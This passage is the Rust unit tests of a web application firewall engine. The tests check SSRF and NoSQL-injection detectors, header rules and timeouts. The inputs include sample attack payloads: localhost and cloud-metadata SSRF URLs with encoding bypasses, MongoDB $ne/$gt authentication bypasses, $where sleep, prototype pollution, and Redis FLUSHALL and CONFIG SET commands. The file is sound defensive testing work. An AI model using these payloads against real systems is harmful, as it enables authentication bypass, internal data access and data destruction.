2916    fn test_ssrf_analyzer_ipv6_mapped() {
2917        // IPv6-mapped localhost
2918        assert!(
2919            ssrf_analyzer_score("http://[::ffff:127.0.0.1]/") > 0,
2920            "Should detect IPv6-mapped localhost"
2921        );
2922        // IPv6-mapped private IP
2923        assert!(
2924            ssrf_analyzer_score("http://[::ffff:192.168.1.1]/") > 0,
2925            "Should detect IPv6-mapped private IP"
2926        );
2927        // IPv6-mapped cloud metadata
2928        assert!(
2929            ssrf_analyzer_score("http://[::ffff:169.254.169.254]/") > 0,
2930            "Should detect IPv6-mapped metadata"
2931        );
2932    }
2933
2934    /// Test SSRF detection for encoded IP bypasses.
2935    #[test]
2936    fn test_ssrf_analyzer_encoded_ip() {
2937        // Decimal localhost: 2130706433 = 127.0.0.1
2938        assert!(
2939            ssrf_analyzer_score("http://2130706433/") > 0,
2940            "Should detect decimal IP (127.0.0.1)"
2941        );
2942        // Hex localhost: 0x7f000001 = 127.0.0.1
2943        assert!(
2944            ssrf_analyzer_score("http://0x7f000001/") > 0,
2945            "Should detect hex IP (127.0.0.1)"
2946        );
2947    }
2948
2949    /// Test SSRF detection for URL-encoded bypasses.
2950    #[test]
2951    fn test_ssrf_analyzer_url_encoded() {
2952        // URL-encoded localhost
2953        assert!(
2954            ssrf_analyzer_score("http%3a%2f%2f127.0.0.1%2f") > 0,
2955            "Should detect URL-encoded SSRF"
2956        );
2957        // Double-encoded
2958        assert!(
2959            ssrf_analyzer_score("http%253a%252f%252f127.0.0.1") > 0,
2960            "Should detect double-encoded SSRF"
2961        );
2962    }
2963
2964    /// Test that legitimate URLs are not flagged as SSRF.
2965    #[test]
2966    fn test_ssrf_analyzer_false_positives() {
2967        // Public IPs
2968        assert!(
2969            ssrf_analyzer_score("http://8.8.8.8/") == 0,
2970            "Should not flag public IP"
2971        );
2972        assert!(
2973            ssrf_analyzer_score("https://google.com/") == 0,
2974            "Should not flag domain"
2975        );
2976        assert!(
2977            ssrf_analyzer_score("http://example.com/api/data") == 0,
2978            "Should not flag normal URL"
2979        );
2980        // Normal content
2981        assert!(
2982            ssrf_analyzer_score("user submitted text") == 0,
2983            "Should not flag normal text"
2984        );
2985        assert!(
2986            ssrf_analyzer_score("192.168.1.1 is a private IP") == 0,
2987            "Should not flag IP without URL context"
2988        );
2989    }
2990
2991    // ==================== NoSQL Injection Detection Tests ====================
2992
2993    /// Test NoSQL detection for MongoDB operator injection.
2994    #[test]
2995    fn test_nosql_analyzer_mongo_operators() {
2996        // MongoDB operators
2997        assert!(
2998            nosql_analyzer_score(r#"{"username": {"$ne": null}}"#) > 0,
2999            "Should detect $ne operator"
3000        );
3001        assert!(
3002            nosql_analyzer_score(r#"{"age": {"$gt": 18}}"#) > 0,
3003            "Should detect $gt operator"
3004        );
3005        assert!(
3006            nosql_analyzer_score(r#"{"name": {"$regex": ".*"}}"#) > 0,
3007            "Should detect $regex operator"
3008        );
3009        assert!(
3010            nosql_analyzer_score(r#"{"$or": [{"a": 1}, {"b": 2}]}"#) > 0,
3011            "Should detect $or operator"
3012        );
3013    }
3014
3015    /// Test NoSQL detection for MongoDB $where JavaScript execution (HIGH RISK).
3016    #[test]
3017    fn test_nosql_analyzer_where_js() {
3018        // $where with JavaScript function (CRITICAL)
3019        assert!(
3020            nosql_analyzer_score(r#"{"$where": "function() { return true; }"}"#) > 0,
3021            "Should detect $where with function"
3022        );
3023        assert!(
3024            nosql_analyzer_score(r#"{"$where": "this.password == 'test'"}"#) > 0,
3025            "Should detect $where with this keyword"
3026        );
3027        assert!(
3028            nosql_analyzer_score(r#"{"$where": "sleep(5000)"}"#) > 0,
3029            "Should detect $where with sleep (DoS)"
3030        );
3031    }
3032
3033    /// Test NoSQL detection for MongoDB authentication bypass.
3034    #[test]
3035    fn test_nosql_analyzer_auth_bypass() {
3036        // Authentication bypass patterns
3037        assert!(
3038            nosql_analyzer_score(r#"{"password": {"$ne": ""}}"#) > 0,
3039            "Should detect password $ne bypass"
3040        );
3041        assert!(
3042            nosql_analyzer_score(r#"{"username": "admin", "password": {"$gt": ""}}"#) > 0,
3043            "Should detect password $gt bypass"
3044        );
3045        assert!(
3046            nosql_analyzer_score(r#"{"user": {"$exists": true}}"#) > 0,
3047            "Should detect user $exists bypass"
3048        );
3049    }
3050
3051    /// Test NoSQL detection for prototype pollution.
3052    #[test]
3053    fn test_nosql_analyzer_proto_pollution() {
3054        // Prototype pollution (can lead to RCE)
3055        assert!(
3056            nosql_analyzer_score(r#"{"__proto__": {"isAdmin": true}}"#) > 0,
3057            "Should detect __proto__ pollution"
3058        );
3059        assert!(
3060            nosql_analyzer_score(r#"{"constructor": {"prototype": {}}}"#) > 0,
3061            "Should detect constructor pollution"
3062        );
3063        assert!(
3064            nosql_analyzer_score(r#"{"prototype": {"polluted": true}}"#) > 0,
3065            "Should detect direct prototype pollution"
3066        );
3067    }
3068
3069    /// Test NoSQL detection for CouchDB special endpoints.
3070    #[test]
3071    fn test_nosql_analyzer_couchdb() {
3072        assert!(
3073            nosql_analyzer_score("/_all_docs") > 0,
3074            "Should detect _all_docs endpoint"
3075        );
3076        assert!(
3077            nosql_analyzer_score("/_design/mydesign/_view/myview") > 0,
3078            "Should detect _design/_view endpoints"
3079        );
3080        assert!(
3081            nosql_analyzer_score("/_changes?since=0") > 0,
3082            "Should detect _changes endpoint"
3083        );
3084    }
3085
3086    /// Test NoSQL detection for Redis dangerous commands.
3087    #[test]
3088    fn test_nosql_analyzer_redis() {
3089        assert!(
3090            nosql_analyzer_score("EVAL \"return 1\" 0") > 0,
3091            "Should detect EVAL command"
3092        );
3093        assert!(
3094            nosql_analyzer_score("FLUSHALL") > 0,
3095            "Should detect FLUSHALL command"
3096        );
3097        assert!(
3098            nosql_analyzer_score("CONFIG SET dir /tmp") > 0,
3099            "Should detect CONFIG command"
3100        );
3101        assert!(
3102            nosql_analyzer_score("KEYS *") > 0,
3103            "Should detect KEYS command"
3104        );
3105    }
3106
3107    /// Test NoSQL detection for URL-encoded bypasses.
3108    #[test]
3109    fn test_nosql_analyzer_url_encoded() {
3110        // URL-encoded "$where": pattern (%24 = $, %22 = ", %3A = :)
3111        assert!(
3112            nosql_analyzer_score("%22%24where%22%3A") > 0,
3113            "Should detect URL-encoded \"$where\":"
3114        );
3115        // URL-encoded {"$ne": ""} pattern
3116        assert!(
3117            nosql_analyzer_score("%7B%22password%22%3A%7B%22%24ne%22%3A%22%22%7D%7D") > 0,
3118            "Should detect URL-encoded password $ne bypass"
3119        );
3120        // URL-encoded __proto__
3121        assert!(
3122            nosql_analyzer_score("%22__proto__%22%3A") > 0,
3123            "Should detect URL-encoded __proto__"
3124        );
3125    }
3126
3127    /// Test that legitimate JSON queries are not flagged.
3128    #[test]
3129    fn test_nosql_analyzer_false_positives() {
3130        // Normal JSON
3131        assert!(
3132            nosql_analyzer_score(r#"{"name": "John", "age": 30}"#) == 0,
3133            "Should not flag normal JSON"
3134        );
3135        assert!(
3136            nosql_analyzer_score(r#"{"status": "active"}"#) == 0,
3137            "Should not flag simple key-value"
3138        );
3139        // Normal text
3140        assert!(
3141            nosql_analyzer_score("hello world") == 0,
3142            "Should not flag normal text"
3143        );
3144        assert!(
3145            nosql_analyzer_score("user@example.com") == 0,
3146            "Should not flag email"
3147        );
3148    }
3149
3150    #[test]
3151    fn test_header_evaluation() {
3152        let mut engine = Engine::empty();
3153        let rules = r#"[
3154            {
3155                "id": 1,
3156                "description": "Block bad user-agent",
3157                "risk": 10.0,
3158                "blocking": true,
3159                "matches": [
3160                    {"type": "header", "field": "User-Agent", "match": {"type": "contains", "match": "bad-bot"}}
3161                ]
3162            }
3163        ]"#;
3164        engine.load_rules(rules.as_bytes()).unwrap();
3165
3166        let verdict = engine.analyze(&Request {
3167            method: "GET",
3168            path: "/",
3169            headers: vec![Header::new("User-Agent", "bad-bot/1.0")],
3170            ..Default::default()
3171        });
3172
3173        assert_eq!(verdict.action, Action::Block);
3174        assert!(verdict.matched_rules.contains(&1));
3175    }
3176
3177    // ============ Timeout Tests ============
3178
3179    #[test]
3180    fn test_analyze_safe_basic() {
3181        let mut engine = Engine::empty();
3182        let rules = r#"[
3183            {
3184                "id": 1,
3185                "description": "Simple match",
3186                "risk": 10.0,
3187                "matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
3188            }
3189        ]"#;
3190        engine.load_rules(rules.as_bytes()).unwrap();
3191
3192        let verdict = engine.analyze_safe(&Request {
3193            method: "GET",
3194            path: "/test",
3195            ..Default::default()
3196        });
3197
3198        // Normal requests should complete without timeout
3199        assert!(!verdict.timed_out);
3200        assert!(verdict.rules_evaluated.is_none());
3201        assert!(verdict.matched_rules.contains(&1));
3202    }
3203
3204    #[test]
3205    fn test_analyze_with_timeout_custom() {
3206        let mut engine = Engine::empty();
3207        let rules = r#"[
3208            {
3209                "id": 1,
3210                "description": "Simple match",
3211                "risk": 10.0,
3212                "matches": [{"type": "uri", "match": {"type": "contains", "match": "test"}}]
3213            }
3214        ]"#;
3215        engine.load_rules(rules.as_bytes()).unwrap();
3216
3217        let verdict = engine.analyze_with_timeout(
3218            &Request {
3219                method: "GET",
3220                path: "/test",
3221                ..Default::default()
3222            },
3223            Duration::from_millis(100),
3224        );
3225
3226        // Normal request should not timeout
3227        assert!(!verdict.timed_out);
3228    }
3229
3230    #[test]
3231    fn test_timeout_cap() {
3232        // Verify MAX_EVAL_TIMEOUT is respected
3233        assert!(MAX_EVAL_TIMEOUT >= DEFAULT_EVAL_TIMEOUT);
3234        assert!(MAX_EVAL_TIMEOUT <= Duration::from_secs(1)); // Sanity check
3235    }
3236
3237    #[test]
3238    fn test_verdict_timeout_fields_default() {
3239        let verdict = Verdict::default();
3240        assert!(!verdict.timed_out);
3241        assert!(verdict.rules_evaluated.is_none());
3242    }
3243
3244    #[test]
3245    fn test_eval_context_deadline() {
3246        let req = Request {
3247            method: "GET",
3248            path: "/test",
3249            ..Default::default()
3250        };
3251
3252        // Without deadline
3253        let ctx = EvalContext::from_request(&req);
3254        assert!(ctx.deadline.is_none());
3255        assert!(!ctx.is_deadline_exceeded());
3256
3257        // With future deadline
3258        let future_deadline = Instant::now() + Duration::from_secs(10);
3259        let ctx_with_deadline = EvalContext::from_request_with_deadline(&req, future_deadline);
3260        assert!(ctx_with_deadline.deadline.is_some());
3261        assert!(!ctx_with_deadline.is_deadline_exceeded());
3262
3263        // With past deadline
3264        let past_deadline = Instant::now() - Duration::from_millis(1);
3265        let ctx_expired = EvalContext::from_request_with_deadline(&req, past_deadline);
3266        assert!(ctx_expired.is_deadline_exceeded());
3267    }
3268
3269    #[test]
3270    fn test_load_rules_regex_error() {
3271        let mut engine = Engine::empty();
3272        // Invalid regex (missing closing bracket)
3273        let rules = r#"[
3274            {
3275                "id": 1,
3276                "description": "Invalid regex",
3277                "risk": 10.0,
3278                "matches": [
3279                    {
3280                        "type": "uri",
3281                        "match": {
3282                            "type": "regex",
3283                            "match": "["
3284                        }
3285                    }
3286                ]
3287            }
3288        ]"#;
3289        let result = engine.load_rules(rules.as_bytes());
3290        assert!(result.is_err());
3291        match result {
3292            Err(WafError::RegexError(msg)) => assert!(msg.contains("[")),
3293            _ => panic!("Expected RegexError, got {:?}", result),
3294        }
3295    }
3296}
synapse_pingora/waf/engine.rs

synapse_pingora/waf/
engine.rs